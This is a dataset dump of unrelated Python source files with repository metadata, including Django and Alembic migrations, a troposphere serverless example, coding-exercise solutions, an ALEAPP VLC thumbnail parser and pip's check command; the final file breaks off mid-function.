8ab3a527fcc6c400ca1e11d93353afea466366c7
|
refs/heads/main
| 2023-05-09T14:46:46.185172 | 2021-06-02T15:15:13 | 2021-06-02T15:15:13 | 342,639,772 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
# Generated by Django 3.0.8 on 2021-02-01 13:19
from django.db import migrations, models
import profiles.models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0006_auto_20210127_2212'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.ImageField(blank=True, default='E:\\WORK\\tergum-shared-master\\0131\\tergum-shared-master\\tergum-shared-master\\staticfiles+base\\images\\profile_placeholder.png', upload_to=profiles.models.image_file_name),
),
]
|
[
"[email protected]"
] | |
911a983b38870d5b30029913df017ccfc099817a
|
549d8be84d27a1d6890c8539a519e58bd355351d
|
/examples/Serverless_Api_Backend.py
|
a0a2afbb3626a21ea3f17b0f3d8c9aa196248301
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
anoora17/troposphere
|
1dabd3b4da89c593444c1564ef13fdae6e61acff
|
47db869b2875b9517df5fdd90d5e15505a555b09
|
refs/heads/master
| 2020-03-17T23:32:55.048454 | 2018-05-17T17:24:39 | 2018-05-17T17:24:39 | 134,050,719 | 1 | 0 |
BSD-2-Clause
| 2018-05-19T10:05:51 | 2018-05-19T10:05:51 | null |
UTF-8
|
Python
| false | false | 2,212 |
py
|
# Converted from api_backend located at:
# https://github.com/awslabs/serverless-application-model/blob/dbc54b5d0cd31bf5cebd16d765b74aee9eb34641/examples/2016-10-31/api_backend/template.yaml
from troposphere import Template, Ref
from troposphere.awslambda import Environment
from troposphere.serverless import Function, ApiEvent, SimpleTable
t = Template()
t.add_description(
"Simple CRUD webservice. State is stored in a SimpleTable (DynamoDB) "
"resource.")
t.add_transform('AWS::Serverless-2016-10-31')
simple_table = t.add_resource(
SimpleTable("Table")
)
t.add_resource(
Function(
"GetFunction",
Handler='index.get',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'GetResource': ApiEvent(
'GetResource',
Path='/resource/{resourceId}',
Method='get'
)
}
)
)
t.add_resource(
Function(
"PutFunction",
Handler='index.put',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'PutResource': ApiEvent(
'PutResource',
Path='/resource/{resourceId}',
Method='put'
)
}
)
)
t.add_resource(
Function(
"DeleteFunction",
Handler='index.delete',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'DeleteResource': ApiEvent(
'DeleteResource',
Path='/resource/{resourceId}',
Method='delete'
)
}
)
)
print(t.to_json())
|
[
"[email protected]"
] | |
b146a8d58b6c44b8b91c6e10e0eee5d3ae1c1e03
|
365967082720f3fda31afccfc237b7a67e8ffc07
|
/sorting_searching/peak.py
|
dd2d896b427e16191838c3197c5819483f3b6557
|
[] |
no_license
|
hulaba/geekInsideYou
|
ec68dee3fa24d63f5470aa40b600ef34d37c5da1
|
72c1f1b4fbf115db91c908a68c9ac3ca4cb22a4f
|
refs/heads/master
| 2022-12-11T11:11:03.149336 | 2020-09-12T16:12:40 | 2020-09-12T16:12:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,363 |
py
|
# your task is to complete this function
# function should return index to the any valid peak element
def peakElement(arr, n):
# Code here
if n is 1:
return 0
for i in range(n):
# if element at first index is greater than next
if i == 0 and arr[1] < arr[0]:
return 0
# if element is at last index and it is greater than
# its prev one
elif i == n - 1 and arr[n - 2] < arr[n - 1]:
return n - 1
# case, when element is at any other index
# then you need to check both of its neighbour
elif arr[i - 1] < arr[i] and arr[i] > arr[i + 1]:
return i
# {
# Driver Code Starts
if __name__ == '__main__':
t = int(input())
for i in range(t):
n = int(input())
arr = list(map(int, input().strip().split()))
index = peakElement(arr, n)
flag = False
if index == 0 and n == 1:
flag = True
elif index == 0 and arr[index] >= arr[index + 1]:
flag = True
elif index == n - 1 and arr[index] >= arr[index - 1]:
flag = True
elif arr[index - 1] <= arr[index] and arr[index] >= arr[index + 1]:
flag = True
else:
flag = False
if flag:
print(1)
else:
print(0)
# } Driver Code Ends
|
[
"[email protected]"
] | |
5cad52e17f840954f11e4f3480533211c904549e
|
956cc6ff2b58a69292f7d1223461bc9c2b9ea6f1
|
/monk/system_unit_tests/pytorch/test_activation_softmin.py
|
cde9b1d95f3da0fc6c01dd83ce0386fe8fc78a97
|
[
"Apache-2.0"
] |
permissive
|
Aanisha/monk_v1
|
c24279b2b461df9b3de2984bae0e2583aba48143
|
c9e89b2bc0c1dbb320aa6da5cba0aa1c1526ad72
|
refs/heads/master
| 2022-12-29T00:37:15.320129 | 2020-10-18T09:12:13 | 2020-10-18T09:12:13 | 286,278,278 | 0 | 0 |
Apache-2.0
| 2020-08-09T16:51:02 | 2020-08-09T16:51:02 | null |
UTF-8
|
Python
| false | false | 1,348 |
py
|
import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from pytorch_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import torch
import numpy as np
from pytorch.losses.return_loss import load_loss
def test_activation_softmin(system_dict):
forward = True;
test = "test_activation_softmin";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
network = [];
network.append(gtf.softmin());
gtf.Compile_Network(network, data_shape=(3, 64, 64), use_gpu=False);
x = torch.randn(1, 3, 64, 64);
y = gtf.system_dict["local"]["model"](x);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
|
[
"[email protected]"
] | |
45d620d1e60cd162a992f66503976015885c17a8
|
60cbdf1f9771159f872e632017fa736800784297
|
/Leetcode/Check-if-the-Sentence-is-Pangram.py
|
fe3da8ce862e017efe6b6dd38769acb3b97e5a82
|
[] |
no_license
|
AG-Systems/programming-problems
|
6ea8c109f04c4d22db6e63fe7b665894c786242a
|
39b2d3546d62b48388788e36316224e15a52d656
|
refs/heads/master
| 2023-04-16T16:59:20.595993 | 2023-04-05T01:25:23 | 2023-04-05T01:25:23 | 77,095,208 | 10 | 3 | null | 2019-10-14T16:16:18 | 2016-12-22T00:03:14 |
Python
|
UTF-8
|
Python
| false | false | 332 |
py
|
class Solution:
def checkIfPangram(self, sentence: str) -> bool:
letter_counter = {}
for letter in sentence:
if letter in letter_counter:
letter_counter[letter] += 1
else:
letter_counter[letter] = 1
return len(letter_counter.keys()) == 26
|
[
"[email protected]"
] | |
0ae5585fb9e152b45e4cc381b1aea2c6b8c650fe
|
18b250fe572223ade49c2cf995e0aad0613abc6a
|
/scripts/artifacts/vlcThumbs.py
|
5a1156c12cdf50a0855a63068213cc7f249375c2
|
[
"MIT"
] |
permissive
|
ydkhatri/ALEAPP
|
e79e558005bf92519e45b17be99ad13aabf4f25e
|
4f2a739d6accd832176cac8db72cded07fb17633
|
refs/heads/master
| 2022-08-19T07:14:59.669286 | 2022-07-26T03:09:16 | 2022-07-26T03:09:16 | 242,858,450 | 0 | 0 |
MIT
| 2021-03-19T16:09:59 | 2020-02-24T22:33:34 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,337 |
py
|
import os
import shutil
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import timeline, tsv, is_platform_windows, open_sqlite_db_readonly
def get_vlcThumbs(files_found, report_folder, seeker, wrap_text):
data_list = []
for file_found in files_found:
file_found = str(file_found)
data_file_real_path = file_found
shutil.copy2(data_file_real_path, report_folder)
data_file_name = os.path.basename(data_file_real_path)
thumb = f'<img src="{report_folder}/{data_file_name}"></img>'
data_list.append((data_file_name, thumb))
path_to_files = os.path.dirname(data_file_real_path)
description = 'VLC Thumbnails'
report = ArtifactHtmlReport('VLC Thumbnails')
report.start_artifact_report(report_folder, 'VLC Thumbnails', description)
report.add_script()
data_headers = ('Filename', 'Thumbnail' )
report.write_artifact_data_table(data_headers, data_list, path_to_files, html_escape=False)
report.end_artifact_report()
tsvname = 'VLC Thumbnails'
tsv(report_folder, data_headers, data_list, tsvname)
__artifacts__ = {
"VLC Thumbs": (
"VLC",
('*/org.videolan.vlc/files/medialib/*.jpg'),
get_vlcThumbs)
}
|
[
"[email protected]"
] | |
9af56f4a07be6988eb257460a4bda61c2d12b231
|
abf3ea33a5fa7457d1cd735310700df9c784d1ae
|
/CST100/Chapter_4/Chapter_4/Ch_4_Solutions/Ch_4_Projects/4.11/testnode.py
|
fbe1aafaeffff3f7a79626078998ce6c7db6794c
|
[] |
no_license
|
hieugomeister/ASU
|
57b8a2f604a27ce339675f40d3b042ccf57efb86
|
3e9254cebeaeb1c57ae912d6e5a02af7531128e8
|
refs/heads/master
| 2020-12-30T16:59:17.801581 | 2017-05-12T22:44:44 | 2017-05-12T22:44:44 | 91,046,525 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,934 |
py
|
"""
File: testnode.py
Project 4.11
Add a makeTwoWay function.
Tests the Node class.
"""
from node import Node, TwoWayNode
def length(head):
"""Returns the number of items in the linked structure
referred to by head."""
probe = head
count = 0
while probe != None:
count += 1
probe = probe.next
return count
def insert(index, newItem, head):
"""Inserts newItem at position is the linked structure
referred to by head. Returns a reference to the new
structure."""
if index <= 0:
# newItem goes at the head
head = Node(newItem, head)
else:
# Search for node at position index - 1 or the last position
probe = head
while index > 1 and probe.next != None:
probe = probe.next;
index -= 1
# Insert new node after node at position index - 1
# or last position
probe.next = Node(newItem, probe.next)
return head
def pop(index, head):
"""Removes the item at index from the linked structure
referred to by head and returns the tuple (head, item)
Precondition: 0 <= index < length(head)"""
if index < 0 or index >= length(head):
raise IndexErro("Index out of bounds")
# Assumes that the linked structure has at least one item
if index == 0:
removedItem = head.data
head = head.next
else:
# Search for node at position index - 1 or
# the next to last position
probe = head
while index > 1 and probe.next.next != None:
probe = probe.next
index -= 1
removedItem = probe.next.data
probe.next = probe.next.next
return (head, removedItem)
def makeTwoWay(head):
"""Creates and returns a doubly linked structure that
contains the items in the structure referred to by head."""
if head is None:
# Empty structure
return None
else:
# Set the first node
twoWayHead = TwoWayNode(head.data)
twoWayProbe = twoWayHead
probe = head
# Set remaining nodes, if any
while probe.next != None:
newNode = TwoWayNode(probe.next.data, twoWayProbe)
twoWayProbe.next = newNode
twoWayProbe = newNode
probe = probe.next
return twoWayHead
def printStructure(head):
"""Prints the items in the structure referred to by head."""
probe = head
while probe != None:
print(probe.data, end = " ")
probe = probe.next
print()
def main():
"""Tests modifications."""
head = None
# Add five nodes to the beginning of the linked structure
for count in range(1, 6):
head = Node(count, head)
print("5 4 3 2 1:", end = " ")
printStructure(head)
print("5 4 3 2 1:", end = " ")
twoWayHead = makeTwoWay(head)
printStructure(twoWayHead)
if __name__ == "__main__": main()
|
[
"[email protected]"
] | |
c3403fa8e1e383b59e7d439c6a8cb4257c367515
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4466/codes/1734_2506.py
|
7e3f3e2a8fa3a6b63bd10bd541c82d212da44969
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 372 |
py
|
q_inicial = int(input("quantidade inicial: "))
perc = float(input("percentual de crescimento: "))
quant = int(input("quantidade de pirarucus retirados: "))
perc = perc/100
t = 0
while(0 <= q_inicial <= 12000):
q_inicial = (q_inicial + q_inicial * perc) - quant
t = t + 1
if(q_inicial <= 0):
print("EXTINCAO")
print(t)
if(q_inicial >= 12000):
print("LIMITE")
print(t)
|
[
"[email protected]"
] | |
eb93813e0136a34f5b51222dd6b5c3141c7b1d1c
|
eb280992ab7c39173f6f19d28ddf7efd8a29775a
|
/calaccess_processed_elections/apps.py
|
b93b394463300e21fac2cb0fa5fcc3069b0c68f6
|
[
"MIT"
] |
permissive
|
ryanvmenezes/django-calaccess-processed-data
|
f5e99a8bdaf7c6555e357d3dabfd673fd12b8419
|
966635c8438cda440a12f7765af7c79b5bcb3995
|
refs/heads/master
| 2020-04-14T22:41:49.520588 | 2018-10-10T12:07:57 | 2018-10-10T12:07:57 | 99,171,493 | 0 | 0 | null | 2017-08-03T00:02:03 | 2017-08-03T00:02:03 | null |
UTF-8
|
Python
| false | false | 3,720 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Basic configuration for the application.
"""
from __future__ import unicode_literals, absolute_import
import os
import collections
from django.apps import apps
from django.apps import AppConfig
class CalAccessProcessedElectionsConfig(AppConfig):
"""
Application configuration.
"""
name = 'calaccess_processed_elections'
verbose_name = "CAL-ACCESS processed data: Elections"
# Where SQL files are stored in this application
sql_directory_path = os.path.join(os.path.dirname(__file__), 'sql')
def get_ocd_models_list(self):
"""
Returns a list of all the OCD models proxied by this app.
"""
return list(self.get_ocd_models_map().keys())
def get_ocd_proxy_lookup(self):
"""
Returns a dictionary with the names of data models mapped to proxies.
"""
# Convert the keys to strings
return dict((k.__name__, v) for k, v in self.get_ocd_models_map().items())
def get_ocd_models_map(self):
"""
Returns a list of the models that should be saved in our archive.
"""
from . import proxies
ocd_core = apps.get_app_config('core')
ocd_elections = apps.get_app_config('elections')
# Create a dict mapping the models to proxies
return collections.OrderedDict({
ocd_core.get_model('Division'): proxies.OCDDivisionProxy,
ocd_core.get_model('Organization'): proxies.OCDOrganizationProxy,
ocd_core.get_model('OrganizationIdentifier'): proxies.OCDOrganizationIdentifierProxy,
ocd_core.get_model('OrganizationName'): proxies.OCDOrganizationNameProxy,
ocd_core.get_model('Jurisdiction'): proxies.OCDJurisdictionProxy,
ocd_core.get_model('Post'): proxies.OCDPostProxy,
ocd_core.get_model('Person'): proxies.OCDPersonProxy,
ocd_core.get_model('PersonIdentifier'): proxies.OCDPersonIdentifierProxy,
ocd_core.get_model('PersonName'): proxies.OCDPersonNameProxy,
ocd_core.get_model('Membership'): proxies.OCDMembershipProxy,
ocd_elections.get_model('Election'): proxies.OCDElectionProxy,
ocd_elections.get_model('ElectionIdentifier'): proxies.OCDElectionIdentifierProxy,
ocd_elections.get_model('ElectionSource'): proxies.OCDElectionSourceProxy,
ocd_elections.get_model('Candidacy'): proxies.OCDCandidacyProxy,
ocd_elections.get_model('CandidacySource'): proxies.OCDCandidacySourceProxy,
ocd_elections.get_model('BallotMeasureContest'): proxies.OCDBallotMeasureContestProxy,
ocd_elections.get_model('BallotMeasureContestOption'): proxies.OCDBallotMeasureContestOptionProxy,
ocd_elections.get_model('BallotMeasureContestIdentifier'): proxies.OCDBallotMeasureContestIdentifierProxy,
ocd_elections.get_model('BallotMeasureContestSource'): proxies.OCDBallotMeasureContestSourceProxy,
ocd_elections.get_model('RetentionContest'): proxies.OCDRetentionContestProxy,
ocd_elections.get_model('RetentionContestOption'): proxies.OCDRetentionContestOptionProxy,
ocd_elections.get_model('RetentionContestIdentifier'): proxies.OCDRetentionContestIdentifierProxy,
ocd_elections.get_model('RetentionContestSource'): proxies.OCDRetentionContestSourceProxy,
ocd_elections.get_model('CandidateContest'): proxies.OCDCandidateContestProxy,
ocd_elections.get_model('CandidateContestPost'): proxies.OCDCandidateContestPostProxy,
ocd_elections.get_model('CandidateContestSource'): proxies.OCDCandidateContestSourceProxy
})
|
[
"[email protected]"
] | |
4f54753f579ffb5420f90b1d8b8a3f5e105c7783
|
34652a47355a8dbe9200db229a1bbc62619de364
|
/Algorithms/eppstein/PartitionRefinement.py
|
25028f7afc76ad44dc47c9bfdac0723cd00e2448
|
[
"MIT"
] |
permissive
|
btrif/Python_dev_repo
|
df34ab7066eab662a5c11467d390e067ab5bf0f8
|
b4c81010a1476721cabc2621b17d92fead9314b4
|
refs/heads/master
| 2020-04-02T13:34:11.655162 | 2019-11-10T11:08:23 | 2019-11-10T11:08:23 | 154,487,015 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,119 |
py
|
"""PartitionRefinement.py
Maintain and refine a partition of a set of items into subsets,
as used e.g. in Hopcroft's DFA minimization algorithm,
modular decomposition of graphs, etc.
D. Eppstein, November 2003.
"""
class PartitionError(Exception): pass
class PartitionRefinement:
"""Maintain and refine a partition of a set of items into subsets.
Space usage for a partition of n items is O(n), and each refine
operation takes time proportional to the size of its argument.
"""
def __init__(self,items):
"""Create a new partition refinement data structure for the given
items. Initially, all items belong to the same subset.
"""
S = set(items)
self._sets = {id(S):S}
self._partition = {x:S for x in S}
def __getitem__(self,element):
"""Return the set that contains the given element."""
return self._partition[element]
def __iter__(self):
"""Loop through the sets in the partition."""
try: # Python 2/3 compatibility
return self._sets.itervalues()
except AttributeError:
return iter(self._sets.values())
def __len__(self):
"""Return the number of sets in the partition."""
return len(self._sets)
def add(self,element,theset):
"""Add a new element to the given partition subset."""
if id(theset) not in self._sets:
raise PartitionError("Set does not belong to the partition")
if element in self._partition:
raise PartitionError("Element already belongs to the partition")
theset.add(element)
self._partition[element] = theset
def remove(self,element):
"""Remove the given element from its partition subset."""
self._partition[element].remove(element)
del self._partition[element]
def refine(self,S):
"""Refine each set A in the partition to the two sets
A & S, A - S. Return a list of pairs (A & S, A - S)
for each changed set. Within each pair, A & S will be
a newly created set, while A - S will be a modified
version of an existing set in the partition.
Not a generator because we need to perform the partition
even if the caller doesn't iterate through the results.
"""
hit = {}
output = []
for x in S:
if x in self._partition:
Ax = self._partition[x]
hit.setdefault(id(Ax),set()).add(x)
for A,AS in hit.items():
A = self._sets[A]
if AS != A:
self._sets[id(AS)] = AS
for x in AS:
self._partition[x] = AS
A -= AS
output.append((AS,A))
return output
def freeze(self):
"""Make all sets in S immutable."""
for S in list(self._sets.values()):
F = frozenset(S)
for x in F:
self._partition[x] = F
self._sets[id(F)] = F
del self._sets[id(S)]
S = {1,4,9,16}
A = PartitionRefinement(S)
print(A.refine(S))
|
[
"[email protected]"
] | |
3f9d7d0aaff42ecd58b1353b226c30457aefb554
|
2fba0a631bb70aaae6dc89bff09f13e728934605
|
/privacy/migrations/0022_auto_20200527_0909.py
|
2f9d37c178d9929cd0adc472a56bc0457b5f6116
|
[] |
no_license
|
murengera/eshoping-api
|
4c5bcbeb7ac3ef12858e08f8a88d4f7b710b5c64
|
90acb0f8db519a38a1bd0976bd1f704f6d02f2dd
|
refs/heads/master
| 2022-12-25T10:19:39.431427 | 2020-09-26T12:35:38 | 2020-09-26T12:35:38 | 286,399,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 724 |
py
|
# Generated by Django 3.0 on 2020-05-27 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('privacy', '0021_auto_20200527_0908'),
]
operations = [
migrations.AlterField(
model_name='privacypoliciesandtermsofuse',
name='_type',
field=models.CharField(choices=[('terms_of_use', 'terms_of_use'), ('privacy_policy', 'privacy_policy')], max_length=50),
),
migrations.AlterField(
model_name='privacypoliciesandtermsofuse',
name='language',
field=models.CharField(choices=[('english', 'english'), ('rwandese', 'rwandese')], max_length=30),
),
]
|
[
"[email protected]"
] | |
5b89414e459547981f97861a6da0ef73ea51b958
|
2db1a0038d26ccb6adc572b536cb5cd401fd7498
|
/lib/python2.7/site-packages/pip/commands/check.py
|
95c64fc66c74741bc3e23fd86868dac809cb4f94
|
[] |
no_license
|
syurk/labpin
|
e795c557e7d7bcd4ff449cb9a3de32959a8c4968
|
04070dd5ce6c0a32c9ed03765f4f2e39039db411
|
refs/heads/master
| 2022-12-12T02:23:54.975797 | 2018-11-29T16:03:26 | 2018-11-29T16:03:26 | 159,692,630 | 0 | 1 | null | 2022-11-19T12:15:55 | 2018-11-29T16:04:20 |
Python
|
UTF-8
|
Python
| false | false | 1,381 |
py
|
import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
|
[
"[email protected]"
] | |
c59b76f55ddc99b1693010dc6662d175c45b7f65
|
69e41359e2f01ffb12e243970a59e6fcc986e09a
|
/solved/Euler56.py
|
87493072ac091de2dbfdf3fae52aa0ea07e77c2d
|
[] |
no_license
|
pfhayes/euler
|
0d4383f9cfa36890bdaf95bfdae553707c6cbc86
|
56f053afffb91262c7c48463700cab4fe6581813
|
refs/heads/master
| 2016-09-05T13:18:46.089574 | 2011-12-21T05:26:41 | 2011-12-21T05:26:41 | 1,786,274 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
py
|
# Find the maximum possible sum of digits for a^b, with a,b < 100
from useful import digits
maxA, maxB, maxSum = 0,0,0
for a in range (100) :
for b in range(100) :
s = sum(digits(a**b))
maxSum = max([s,maxSum])
if s == maxSum :
maxA = a
maxB = b
print maxSum, a, b
|
[
"[email protected]"
] | |
49445015f0ed16f52b4534b346d9f4cc8f0baa8b
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/ec2_read_1/client-vpn-connection_list.py
|
0a5a1dfa2928044398a0fafaa19dbe1a6072d131
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,334 |
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import execute_one_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-client-vpn-connections.html
if __name__ == '__main__':
"""
terminate-client-vpn-connections : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/terminate-client-vpn-connections.html
"""
parameter_display_string = """
# client-vpn-endpoint-id : The ID of the Client VPN endpoint.
"""
add_option_dict = {}
#######################################################################
# setting option use
# ex: add_option_dict["setting_matching_parameter"] = "--owners"
# ex: add_option_dict["setting_key"] = "owner_id"
#######################################################################
# single parameter
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
#######################################################################
# parameter display string
add_option_dict["parameter_display_string"] = parameter_display_string
execute_one_parameter("ec2", "describe-client-vpn-connections", "client-vpn-endpoint-id", add_option_dict)
|
[
"[email protected]"
] | |
e12543041d44d3cb9be84a8134ebde85793d5476
|
1f79d9d02810a944c45fc962c62159035c5a2247
|
/migrations/versions/2ce138017f09_.py
|
44945f5b6e86b3a8d3d753b01cce2d62c3c70333
|
[] |
no_license
|
qsq-dm/mff
|
5f17d6ffd1d4742dc46d1367cff35233af08a450
|
d7f1e6f3fba95fe0d8ebb8937dda64a17e71f048
|
refs/heads/master
| 2020-12-29T02:19:29.037394 | 2016-08-01T15:40:42 | 2016-08-01T15:40:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 619 |
py
|
"""empty message
Revision ID: 2ce138017f09
Revises: 38dd6746c99b
Create Date: 2015-12-10 19:14:00.636524
"""
# revision identifiers, used by Alembic.
revision = '2ce138017f09'
down_revision = '38dd6746c99b'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('user_coupon', sa.Column('is_trial', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('user_coupon', 'is_trial')
### end Alembic commands ###
|
[
"root@localhost"
] |
root@localhost
|
98dc97fd83c006e87c1140e8bd0d5d01343a1be4
|
289e6f9cf1d37fffb45810144e1a15f0de5c19d5
|
/chiro/import_chiro.py
|
0c60ee96d0de34304dd138784cf52fae28a9e7a1
|
[
"MIT",
"CC0-1.0"
] |
permissive
|
chemical-roles/chemical-roles
|
4eb912d6cc767f465e0e35e34d0c803a96e4d4f3
|
78801264a94a8b2b43ff553020483dd2ef9af993
|
refs/heads/master
| 2023-04-11T14:40:53.846885 | 2022-09-02T11:56:06 | 2022-09-02T11:56:06 | 199,155,107 | 6 | 5 |
MIT
| 2021-08-04T09:14:34 | 2019-07-27T11:17:57 |
Python
|
UTF-8
|
Python
| false | false | 1,492 |
py
|
import logging
from pyobo import get_id_name_mapping, get_obo_graph
RELATIONSHIPS = [
"activator_of",
"agonist_of",
"antagonist_of",
"destabilizer_of",
"inducer_of",
"inhibitor_of",
"modulator_of",
"sensitizer_of",
"stabilizier_of",
]
MAPPING_PREFIXES = ["ncbitaxon", "go", "pr", "hp", "mp"]
def main():
graph = get_obo_graph("chiro")
chebi_mapping = get_id_name_mapping("chebi")
mappings = {prefix: get_id_name_mapping(prefix) for prefix in MAPPING_PREFIXES}
triples = []
for h, data in graph.nodes(data=True):
if not data:
continue
r, t = data["relationship"][0].split()
r = r[: -len("_of")]
h_name = chebi_mapping.get(h)
if h_name is None:
print(f"Could not find name for chemical {h}")
continue
t_namespace = t.split(":")[0].lower()
t_mapping = mappings[t_namespace]
t_name = t_mapping.get(t)
if t_name is None:
print(f"Could not find name for target {t}")
continue
triples.append(("chebi", h, h_name, r, t_namespace, t, t_name))
with open("chiro_import.tsv", "w") as file:
print(
"source_db source_id source_name modulation type target_db target_id target_name",
file=file,
)
for t in sorted(triples):
print(*t, sep="\t", file=file)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
[
"[email protected]"
] | |
c79714327ccf731a9a7f8568306169ba46c9dba8
|
84f2cdc80da796b38433e88d9145cbd797e85f42
|
/flaws/asttools.py
|
c4a8cb3502876a4d90fce1e613bde8734d777a52
|
[
"BSD-2-Clause"
] |
permissive
|
EricSchles/flaws
|
3be808d37fa1bfd050fa8e0ec3791ab7ee1e5365
|
a6de9c2c2a89f79bd67a20535cea6a9ca677f357
|
refs/heads/master
| 2021-01-17T08:05:27.603218 | 2014-08-23T08:07:52 | 2014-08-23T08:07:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
import ast
def is_write(node):
return isinstance(node, (ast.Import, ast.ImportFrom,
ast.FunctionDef, ast.ClassDef, ast.arguments)) \
or isinstance(node.ctx, (ast.Store, ast.Del, ast.Param))
def is_use(node):
return isinstance(node, ast.Name) \
and isinstance(node.ctx, (ast.Load, ast.Del))
def is_constant(node):
return isinstance(node, ast.Name) and node.id.isupper()
def ast_eval(node):
if isinstance(node, ast.List):
return map(ast_eval, node.elts)
elif isinstance(node, ast.Str):
return node.s
elif isinstance(node, ast.Num):
return node.n
else:
raise ValueError("Don't know how to eval %s" % node.__class__.__name__)
def name_class(node):
if isinstance(node, (ast.Import, ast.ImportFrom)):
return 'import'
elif isinstance(node, ast.FunctionDef):
return 'function'
elif isinstance(node, ast.ClassDef):
return 'class'
elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Param) \
or isinstance(node, ast.arguments):
return 'param'
else:
return 'variable'
def node_str(node):
return '%s at %d:%d' % (name_class(node), node.lineno, node.col_offset)
def nodes_str(nodes):
return '[%s]' % ', '.join(map(node_str, nodes))
|
[
"[email protected]"
] | |
cbfc0f372350492bb4d3e472bf7a52dee56b078a
|
f3188f1f9da38f995bd65a423b2cc1cd1c31c55f
|
/PythonLeetcode/BinarySearch/easy/744. 寻找比目标字母大的最小字母.py
|
e5560199093099a93e75b3f4098cec0ae680a596
|
[
"MIT"
] |
permissive
|
Lcoderfit/Introduction-to-algotithms
|
34be05019870b6d4d967b0112e7953829448cdb0
|
aea2630be6ca2c60186593d6e66b0a59e56dc848
|
refs/heads/master
| 2023-05-11T01:01:09.222149 | 2021-10-13T03:16:40 | 2021-10-13T03:16:40 | 146,017,809 | 3 | 1 |
MIT
| 2023-05-05T02:22:34 | 2018-08-24T16:56:13 |
Go
|
UTF-8
|
Python
| false | false | 1,829 |
py
|
"""
方法1: 二分查找
时间复杂度:O(logn)
空间复杂度:O(1)
方法2: 线性扫描
时间复杂度:O(n)
空间复杂度:O(1)
case1:
a
c f j
case 2:
c
c f j
case 3:
d
c f j
case 4:
g
c f j
case 5:
j
c f j
case 6:
k
c f j
"""
import sys
from typing import List
class Solution:
@staticmethod
def next_greatest_letter(letters: List[str], target: str) -> str:
i, j = 0, len(letters) - 1
